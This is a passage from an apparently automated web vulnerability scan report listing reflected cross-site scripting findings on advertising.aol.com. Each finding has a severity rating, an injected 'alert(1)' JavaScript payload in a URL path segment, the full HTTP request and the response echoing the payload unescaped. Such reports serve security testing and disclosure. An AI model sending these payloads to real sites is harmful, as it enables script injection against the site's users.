Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:51:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/2be31"-alert(1)-"ccced9a65eb/3/3/613602259/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.22. http://advertising.aol.com/token/4/3/1958003760/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/1958003760/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6078"-alert(1)-"429fe3342d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e6078"-alert(1)-"429fe3342d8/4/3/1958003760/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e6078"-alert(1)-"429fe3342d8/4/3/1958003760/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.23. http://advertising.aol.com/token/4/3/543563060/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/543563060/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec8f8"-alert(1)-"c68db13757c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ec8f8"-alert(1)-"c68db13757c/4/3/543563060/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/ec8f8"-alert(1)-"c68db13757c/4/3/543563060/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.24. http://advertising.aol.com/token/4/3/677823551/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/677823551/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 842ea"-alert(1)-"425ec9af40e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /842ea"-alert(1)-"425ec9af40e/4/3/677823551/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/842ea"-alert(1)-"425ec9af40e/4/3/677823551/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.25. http://advertising.aol.com/token/5/3/1564324885/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1564324885/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdc73"-alert(1)-"5ad89bb03db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cdc73"-alert(1)-"5ad89bb03db/5/3/1564324885/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:51:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/cdc73"-alert(1)-"5ad89bb03db/5/3/1564324885/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.26. http://advertising.aol.com/token/5/3/1735492766/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1735492766/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbe0"-alert(1)-"d8ecb12d6ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bfbe0"-alert(1)-"d8ecb12d6ac/5/3/1735492766/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/bfbe0"-alert(1)-"d8ecb12d6ac/5/3/1735492766/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.27. http://advertising.aol.com/token/5/3/1874977494/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1874977494/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5879a"-alert(1)-"bb7dfa01818 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /5879a"-alert(1)-"bb7dfa01818/5/3/1874977494/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/5879a"-alert(1)-"bb7dfa01818/5/3/1874977494/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.28. http://advertising.aol.com/token/6/3/1514848708/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/1514848708/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfd"-alert(1)-"b09ef200713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d0dfd"-alert(1)-"b09ef200713/6/3/1514848708/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/d0dfd"-alert(1)-"b09ef200713/6/3/1514848708/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.29. http://advertising.aol.com/token/6/3/1737613080/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/1737613080/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c86b2"-alert(1)-"5d2c48ff9c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c86b2"-alert(1)-"5d2c48ff9c2/6/3/1737613080/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 07 Sep 2011 12:50:51 GMT
ETag: "aaf9c146398ac9d713fb5d92035e8e57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c86b2"-alert(1)-"5d2c48ff9c2/6/3/1737613080/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.30. http://advertising.aol.com/token/7/3/101981266/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/101981266/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95327"-alert(1)-"3f30dcc58fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /95327"-alert(1)-"3f30dcc58fb/7/3/101981266/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/95327"-alert(1)-"3f30dcc58fb/7/3/101981266/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.31. http://advertising.aol.com/token/7/3/1268491526/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1268491526/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a8c"-alert(1)-"a34ffbae454 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /15a8c"-alert(1)-"a34ffbae454/7/3/1268491526/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:51:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/15a8c"-alert(1)-"a34ffbae454/7/3/1268491526/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.32. http://advertising.aol.com/token/8/3/1715267017/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/1715267017/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fac16"-alert(1)-"9688e994782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fac16"-alert(1)-"9688e994782/8/3/1715267017/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
